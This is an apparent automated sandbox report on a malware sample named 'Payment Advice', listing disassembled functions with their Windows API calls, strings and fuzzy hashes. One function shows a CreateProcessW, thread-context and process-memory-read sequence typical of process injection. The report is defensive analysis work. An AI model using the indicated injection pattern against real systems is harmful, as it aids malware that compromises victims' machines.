API ID: _wcscat$FileModuleNameOpen
String ID: 8!d$\$\Include\
API String ID: 3592542968-2802729426
Opcode ID: 522c8940fd1b4e616f0304af2a07ce6ac3088fd35d765a3dbd3d9cbe60b448c5
Instruction ID: 679183aa3ac1325425091492393374614fe2694b2831dda0421ad23824b191df
Opcode Fuzzy Hash: 522c8940fd1b4e616f0304af2a07ce6ac3088fd35d765a3dbd3d9cbe60b448c5
Instruction Fuzzy Hash: 215195B94043428FC704EF55D8A58AABBF9FF9A300B90592EFB44D3261EB309944CB61

Function 017523B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137fileCOMMON

Download Yara Rule

APIs

Part of subcall function 017522A0: Sleep.KERNELBASE(000001F4), ref: 017522B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017524B4

Strings

WGEG396E8JM, xrefs: 01752517, 0175251A

Memory Dump Source

Source File: 00000000.00000002.1639436591.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1750000_Payment Advice.jbxd

Similarity

API ID: CreateFileSleep
String ID: WGEG396E8JM
API String ID: 2694422964-3790588455
Opcode ID: a4beab9699f3b68cb5269ff943c704d30c2b7c253bb4b19908284e2479a290de
Instruction ID: 1e1065f9b4795d19c233cc92d76b3d503713fc81cc17cbb7246f5a5f42a55f5a
Opcode Fuzzy Hash: a4beab9699f3b68cb5269ff943c704d30c2b7c253bb4b19908284e2479a290de
Instruction Fuzzy Hash: 60518331D14249EBEF11DBE4C818BEEBB78AF48300F104199EA09BB2C1D7B51B45CBA5

Function 005851AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0058522F
_wcscpy.LIBCMT ref: 00585283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00585293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 005F3CB0

Strings

Line: , xrefs: 005F3CD9

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 7daf7490180bd66dc284253d2bbd14c1d721a07808d2224af622660a8220541d
Instruction ID: fc237870116eddaeb41df77666fc8d1dc25b80ac101800c794046c2fdf74b1fb
Opcode Fuzzy Hash: 7daf7490180bd66dc284253d2bbd14c1d721a07808d2224af622660a8220541d
Instruction Fuzzy Hash: 6831AD75008742AAD325FB60DC4AFDA7FD8BF86310F00451AF985A6091EF70A688CB92

Function 00584139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 005841A9: LoadLibraryExW.KERNELBASE(00000001,00000000,00000002,?,?,?,?,005839FE,?,00000001), ref: 005841DB

_free.LIBCMT ref: 005F36B7
_free.LIBCMT ref: 005F36FE

Part of subcall function 0058C833: __wsplitpath.LIBCMT ref: 0058C93E
Part of subcall function 0058C833: _wcscpy.LIBCMT ref: 0058C953
Part of subcall function 0058C833: _wcscat.LIBCMT ref: 0058C968
Part of subcall function 0058C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0058C978

Strings

Bad directive syntax error, xrefs: 005F36E4
>>>AUTOIT SCRIPT<<<, xrefs: 005F3491

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: e35ef115e5072d99f48944bec1b26017da99cc81f1dc6d449987183686facadb
Instruction ID: aaa5ba2b5cf24d43457fa507832ff887384937136d87501725cfec7bae7f0762
Opcode Fuzzy Hash: e35ef115e5072d99f48944bec1b26017da99cc81f1dc6d449987183686facadb
Instruction Fuzzy Hash: 15912C7191021AAFDF04EFA4CC999EEBFB4BF59310F104429F916AB291DB349A45CB90

Function 005840E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005F3725
GetOpenFileNameW.COMDLG32 ref: 005F376F

Part of subcall function 0058660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005853B1,?,?,005861FF,?,00000000,00000001,00000000), ref: 0058662F

Part of subcall function 005840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005840C6

Strings

X, xrefs: 005F373E
t3c, xrefs: 005F3745

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X$t3c
API String ID: 3777226403-2453265952
Opcode ID: d71c192feb3367bbb3ef744cfb7b2fb187043b9618db0b70a54a63a97f89802e
Instruction ID: eb4db6aad4b359741096df8a376de03e682b4f5039cb25dffe46402bf1799b82
Opcode Fuzzy Hash: d71c192feb3367bbb3ef744cfb7b2fb187043b9618db0b70a54a63a97f89802e
Instruction Fuzzy Hash: 3D21D871A101999FDB01EFD4C8097EE7FF9AF89304F004059E905B7241DBB85A89CFA1

Function 005A34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 005A34FE

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 005A3539
__wopenfile.LIBCMT ref: 005A3549

Strings

<G, xrefs: 005A34CD, 005A34F0, 005A34FC

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: cbafaabaeab73253243a767112e236e5ef29a843e2f149c27ae7482ce4d233ca
Instruction ID: 74514d5f22b8eb94f54f4d857f034125f9165f3e43adcf8610bcf804c798da5c
Opcode Fuzzy Hash: cbafaabaeab73253243a767112e236e5ef29a843e2f149c27ae7482ce4d233ca
Instruction Fuzzy Hash: A011C470A003079ADB11BF749C4666E7EA4BF8B354B198825F415DB181EA34CA119BA1

Function 0059D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0059D28B,SwapMouseButtons,00000004,?), ref: 0059D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0059D28B,SwapMouseButtons,00000004,?,?,?,?,0059C865), ref: 0059D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0059D28B,SwapMouseButtons,00000004,?,?,?,?,0059C865), ref: 0059D2FF

Strings

Control Panel\Mouse, xrefs: 0059D2BA

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 106e82d78e8c096e610a3bb5bb2d390a99d1796d5014c7de5b7424360864f690
Instruction ID: 2529f06377f0ab3c96ff7b558ff83a38a0ec7bb5c6794f56e42f7ee7a8482a05
Opcode Fuzzy Hash: 106e82d78e8c096e610a3bb5bb2d390a99d1796d5014c7de5b7424360864f690
Instruction Fuzzy Hash: 33113975611208BFDF208FA8CC84EAF7BB8FF54745F104969E806D7110E731AE419B60

Function 017512A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01751A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01751AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01751B13

Memory Dump Source

Source File: 00000000.00000002.1639436591.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1750000_Payment Advice.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction ID: c08468821d0ad5bffb9af0a12b938d4899b997364537592c566df212a9342a45
Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction Fuzzy Hash: 4E624C30A14258DBEB64CFA4C840BDEB372EF58301F5091A9D50DEB390E7B69E81CB59

Function 005A365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 005A36B7
_memcpy_s.LIBCMT ref: 005A3729
__filbuf.LIBCMT ref: 005A37AA
_memset.LIBCMT ref: 005A37EE

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction ID: 559f04936144e85bd4ae10344312275531a22d4423ef9ca748a5cdc67d96b1e5
Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction Fuzzy Hash: A951A3B0A00306ABDB248FA9C88566E7FA5FF42328F248729F825972D0D7749F548B50

Function 005CC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00584517: _fseek.LIBCMT ref: 0058452F

Part of subcall function 005CC56D: _wcscmp.LIBCMT ref: 005CC65D
Part of subcall function 005CC56D: _wcscmp.LIBCMT ref: 005CC670

_free.LIBCMT ref: 005CC4DD
_free.LIBCMT ref: 005CC4E4
_free.LIBCMT ref: 005CC54F

Part of subcall function 005A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,005A7A85), ref: 005A1CB1
Part of subcall function 005A1C9D: GetLastError.KERNEL32(00000000,?,005A7A85), ref: 005A1CC3

_free.LIBCMT ref: 005CC557

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
Instruction ID: 54980fc974e63801926d1082bd0c5af6a7e93cbee45597bdd9f13cdf3cbd2d0b
Opcode Fuzzy Hash: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
Instruction Fuzzy Hash: A2515DB190421AAFDF149F64DC85BADBFB9FF48310F10449EF649A3251DB715A808F58

Function 005CC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 005CC72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 005CC746

Strings

aut, xrefs: 005CC740

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 983ad06ef5c7e9e72626b5625c70936fc987fc6feefc88842a05555bf1464ee2
Instruction ID: 37141479e48b6ba1d1279242d5f4b1c5f5fe2b16c24880f6547541c258aa7ab0
Opcode Fuzzy Hash: 983ad06ef5c7e9e72626b5625c70936fc987fc6feefc88842a05555bf1464ee2
Instruction Fuzzy Hash: 8AD05E7154030EABDB10AB90DC0EF8B776D9700704F0002A07750A50F1DAB4E7998B94

Function 005DF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef610722441d581ed22c650eb82a9bc084daba6147633f847b03ae3fba2fbba0
Instruction ID: 654f531ff1192ef361f1fce49b2d94e7c1e5ea8379ad46bf7e19a771aab330c7
Opcode Fuzzy Hash: ef610722441d581ed22c650eb82a9bc084daba6147633f847b03ae3fba2fbba0
Instruction Fuzzy Hash: 3BF15B716043029FDB20DF28C885B5ABBE5BFC8314F14892EF9969B391D770E945CB82

Function 00584FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00585022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 005850CB

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 809ece04629ff3300504a988129ad6fcf65dfadbf37724c020d2491e9bdce7bb
Instruction ID: c1c5e3387474bc52f21726f634d9b7ff406dea1865ed787020e6c2e761e9c362
Opcode Fuzzy Hash: 809ece04629ff3300504a988129ad6fcf65dfadbf37724c020d2491e9bdce7bb
Instruction Fuzzy Hash: 313193B1504701CFD721EF64D84969BBFE4FF4A304F00092EFA9A97241E7716984CB92

Function 005A395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 005A3973

Part of subcall function 005A81C2: __NMSG_WRITE.LIBCMT ref: 005A81E9
Part of subcall function 005A81C2: __NMSG_WRITE.LIBCMT ref: 005A81F3

__NMSG_WRITE.LIBCMT ref: 005A397A

Part of subcall function 005A821F: GetModuleFileNameW.KERNEL32(00000000,00640312,00000104,00000000,00000001,00000000), ref: 005A82B1
Part of subcall function 005A821F: ___crtMessageBoxW.LIBCMT ref: 005A835F

Part of subcall function 005A1145: ___crtCorExitProcess.LIBCMT ref: 005A114B
Part of subcall function 005A1145: ExitProcess.KERNEL32 ref: 005A1154

Part of subcall function 005A7C0E: __getptd_noexit.LIBCMT ref: 005A7C0E

RtlAllocateHeap.NTDLL(01760000,00000000,00000001,00000001,00000000,?,?,0059F507,?,0000000E), ref: 005A399F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 920dcfab7d91953548b58538a1c89bf414bcafd1239ccfbd3ad5d2eab580f749
Instruction ID: 09816630a1cad54e9e83f61582924d88006c468351444eae004809bdb48ff9ba
Opcode Fuzzy Hash: 920dcfab7d91953548b58538a1c89bf414bcafd1239ccfbd3ad5d2eab580f749
Instruction Fuzzy Hash: D40192352457129EE7213F68EC5AA7F3F48BFC7768F211125F6059A192DFB09D0086A4

Function 005CC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,005CC385,?,?,?,?,?,00000004), ref: 005CC6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,005CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 005CC708
CloseHandle.KERNEL32(00000000,?,005CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 005CC70F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: e3284690a765a3cce42be5a5be861d584cb43dee1397ee318027cbabbb2c313c
Instruction ID: b62e6cf65dcda19078c94411c534e9d19b49ab814c95a9bbcc31a2cdfd8ee457
Opcode Fuzzy Hash: e3284690a765a3cce42be5a5be861d584cb43dee1397ee318027cbabbb2c313c
Instruction Fuzzy Hash: 5DE08632180214BBD7211B94AC09FCB7F59EB05760F105310FB15690E097B125118798

Function 005CBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005CBB72

Part of subcall function 005A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,005A7A85), ref: 005A1CB1
Part of subcall function 005A1C9D: GetLastError.KERNEL32(00000000,?,005A7A85), ref: 005A1CC3

_free.LIBCMT ref: 005CBB83
_free.LIBCMT ref: 005CBB95

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
Instruction ID: e2c204d7dbb946d7e93d91bea878fa5921139e1b4a098a49d8823e31a17889f1
Opcode Fuzzy Hash: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
Instruction Fuzzy Hash: 0DE0C2A1600B024BEA2065B86E49FB71FDC2F45321F04080DB41AE3142CF20EC4084B8

Function 00582322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 005822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,005824F1), ref: 00582303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005825A1
CoInitialize.OLE32(00000000), ref: 00582618
CloseHandle.KERNEL32(00000000), ref: 005F503A

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 8202f02f95f46827400cd572031936a7a89789de2d020521aad2172b074d823f
Instruction ID: ddee3728628bb7c9986465ea992ed357ec4518a9c78b4f685eec802f343c39a3
Opcode Fuzzy Hash: 8202f02f95f46827400cd572031936a7a89789de2d020521aad2172b074d823f
Instruction Fuzzy Hash: 8D71CEB89413458B8704EF6AE894496BFE7FB9B340780622ED119DF271CBB046C0CF54

Function 005CBBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 005CBC18

Strings

EA06, xrefs: 005CBC46

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 8def63717c5f9868d62b77c9a3462f69433fc7ef966c0f5dc8fa94ada4745343
Instruction ID: 914074a3385957e1fe218eca1a4b0f37adf705899a57b071b904d310a86ce20d
Opcode Fuzzy Hash: 8def63717c5f9868d62b77c9a3462f69433fc7ef966c0f5dc8fa94ada4745343
Instruction Fuzzy Hash: 2101B9719042197EDB18C798C856FEDBFF89B15305F00455EF552D6181E578A7048B60

Function 00583A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00583A73

Part of subcall function 005A1405: __lock.LIBCMT ref: 005A140B

Part of subcall function 00583ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00583AF3
Part of subcall function 00583ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00583B08

Part of subcall function 00583D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00583AA3,?), ref: 00583D45
Part of subcall function 00583D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00583AA3,?), ref: 00583D57
Part of subcall function 00583D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00641148,00641130,?,?,?,?,00583AA3,?), ref: 00583DC8
Part of subcall function 00583D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00583AA3,?), ref: 00583E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00583AB3

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
